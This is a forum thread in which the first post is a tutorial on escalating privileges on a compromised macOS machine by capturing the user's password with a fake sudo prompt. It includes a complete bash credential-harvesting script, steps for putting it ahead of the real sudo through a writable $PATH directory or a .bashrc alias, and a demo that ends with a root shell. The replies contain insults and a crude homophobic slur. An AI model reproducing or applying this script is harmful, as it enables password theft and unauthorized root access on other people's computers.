Author Topic: SSOSXTT II - Ghetto Privilege Escalation on OSX  (Read 2209 times)

0 Members and 1 Guest are viewing this topic.

Offline Spacetoast

  • VIP
  • /dev/null
  • *
  • Posts: 7
  • Cookies: 6
  • Spacecow Reborn
    • View Profile
    • github/Spacecow99
SSOSXTT II - Ghetto Privilege Escalation on OSX
« on: December 12, 2015, 12:18:52 am »
Spacecow's Stoned OSX Tips & Tricks II

Ghetto Privilege Escalation on OSX

In this tutorial we will be putting an OSX spin on the article Ghetto privilege escalation with bashrc. For this scenario, we have comprimised an OSX host using an advanced version of our l337 .app backdoor and are now trying to gain higher privs by simply stealing the users password. In this case we know our target is a nerd (maybe he was tricked in to running the infected app by a belgian on IRC) and he will eventually run the sudo command in a terminal so that will be our target.


Building our fake psudo prompt:

We will start by getting the output of the sudo binary on OSX when we enter an invalid password.

Code: [Select]
$ sudo ls
Password:
Sorry, try again.
Password:
Sorry, try again.
Password:
Sorry, try again.
sudo: 3 incorrect password attempts

Now we will build a quick bash script to mimic this output. Our script will behave a little bit different then the script in the original article except that it will:
  • Only execute once if the output file does not exist already.
  • Fail 3 times to be certain its the right password.
  • Exits with error code 1 on first run.

Code: (bash) [Select]
#!/bin/bash
TARGET="/tmp/$(whoami)-psudo"

if [ ! -f $TARGET ]; then
  for n in 1 2 3; do
    echo -n "Password:"
    stty -echo
    read password
    stty echo
    echo ""
    echo "$(whoami):$password" >> $TARGET
    sleep 1
    echo "Sorry, try again." 1>&2
  done
  echo "sudo: 3 incorrect password attempts"
  exit 1
fi

sudo $*


Execution Method 1: Abusing $PATH:

After writing/copying our script to the target system, we will first check the $PATH variable to see if it has been misconfigured in anyway.

Code: [Select]
$ which sudo
/usr/bin/sudo
$ echo "$PATH"
/Users/Spacecow/.dnx/runtimes/dnx-mono.1.0.0-beta4/bin:/Users/Spacecow/.rbenv/shims:/Users/Spacecow/.rbenv/bin:/usr/local/opt/nvm/v0.10.32/bin:/Users/Spacecow/.bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/lib/node_modules:/usr/local/go/bin

We can see that on my system there are multiple directories in my path before the location of my sudo binary and so we will attempt to move our script to one of these writable directories.

Code: [Select]
$ ls -ld /Users/Spacecow/.bin/
drwxr-xr-x  25 Spacecow  staff  850 Dec 10 16:49 /Users/Spacecow/.bin

Now we simply rename our script to 'sudo', make it executable and wait for the user to run it.

Code: [Select]
$ ls -l /tmp/Spacecow-psudo
ls: /tmp/Spacecow-psudo: No such file or directory
$ sudo su
Password:
Sorry, try again.
Password:
Sorry, try again.
Password:
Sorry, try again.
sudo: 3 incorrect password attempts
$ cat /tmp/Spacecow-psudo
Spacecow:password
Spacecow:password
Spacecow:password
$ sudo su
Password:
# whoami
root


Execution Method 2: Writing to .bashrc:

If our initial check for a misconfigured $PATH yields no fruit, fear not, we can still resort to writing an alias entry in the users bashrc or zshrc. In this case our script is in /tmp/psudo.

Code: [Select]
$ echo 'alias sudo="/tmp/psudo"' >> ~/.bashrc


Conclusion:

Yet again this is a rather simple method of exploitation but will continue to be a viable attack vector for a while. Dont forget that most of this tutorial is a simple OSX implementation of the original article posted earlier so don't forget to go read it to get the most information out of this post.

Stay tuned for more related tutorials from our OSX series. Please let me know about any topics you would like covered in future tutorials, any comments/corrections you have or if you're a macfag interested in contributing to a tutorial.

Sincerely yours,
    -Spacecow
« Last Edit: December 12, 2015, 12:20:21 am by Spacetoast »

Offline queryFrequency

  • aka queerFrequency
  • Serf
  • *
  • Posts: 46
  • Cookies: -12
    • View Profile
Re: SSOSXTT II - Ghetto Privilege Escalation on OSX
« Reply #1 on: December 22, 2015, 10:52:52 pm »
Shitty low quality tutorial, just as low quality as your LSD is.

Offline 0E 800

  • Not a VIP
  • VIP
  • Baron
  • *
  • Posts: 895
  • Cookies: 131
  • • тнε ιηтεяηεт ιs мү яεcүcℓε-вιη •
    • View Profile
Re: SSOSXTT II - Ghetto Privilege Escalation on OSX
« Reply #2 on: December 23, 2015, 03:55:42 am »
Shitty low quality tutorial, just as low quality as your LSD is.

 This is proof, lackey moderation. I call shenanigans. Banhammer and shit.
« Last Edit: December 23, 2015, 04:00:31 am by 0E 800 »
The invariable mark of wisdom is to see the miraculous in the common.

Offline truecam

  • Peasant
  • *
  • Posts: 92
  • Cookies: -46
    • View Profile
Re: SSOSXTT II - Ghetto Privilege Escalation on OSX
« Reply #3 on: December 23, 2015, 03:57:52 am »
This is proof of a lackey moderation. I call shenanigans. Banhammer and shit.
Yes. Many people should have already been banned. Including me.....
Just joking, don't ban me. :(

Offline Spacetoast

  • VIP
  • /dev/null
  • *
  • Posts: 7
  • Cookies: 6
  • Spacecow Reborn
    • View Profile
    • github/Spacecow99
Re: SSOSXTT II - Ghetto Privilege Escalation on OSX
« Reply #4 on: December 30, 2015, 07:17:38 am »
Nice quality tutorial, just as high quality as your LSD is.
P.S I'm also a huge homo that loves penises in my mouth.

Offline truecam

  • Peasant
  • *
  • Posts: 92
  • Cookies: -46
    • View Profile
Re: SSOSXTT II - Ghetto Privilege Escalation on OSX
« Reply #5 on: December 30, 2015, 07:21:44 am »
Honestly why has query not been banned yet?

Offline cr4zi8

  • Serf
  • *
  • Posts: 29
  • Cookies: 26
    • View Profile
Re: SSOSXTT II - Ghetto Privilege Escalation on OSX
« Reply #6 on: January 04, 2016, 08:36:59 pm »
The only thing i can say about this would be it is great for a server or whatever but an average user will rarely open terminal and sudo so this is really only applicable if you are targeting something that receives a fair amount of sysadmin attention.
« Last Edit: January 04, 2016, 08:37:22 pm by cr4zi8 »

Offline Spacetoast

  • VIP
  • /dev/null
  • *
  • Posts: 7
  • Cookies: 6
  • Spacecow Reborn
    • View Profile
    • github/Spacecow99
Re: SSOSXTT II - Ghetto Privilege Escalation on OSX
« Reply #7 on: January 05, 2016, 03:52:46 am »
You're right but I never specified we we're targeting the average user and I never said we weren't. I simply applied a simple quick method to the OSX platform. I can think of several use cases where this would be a viable method but that's not what this article is about. My goal isn't to hold your hand through every possible scenario.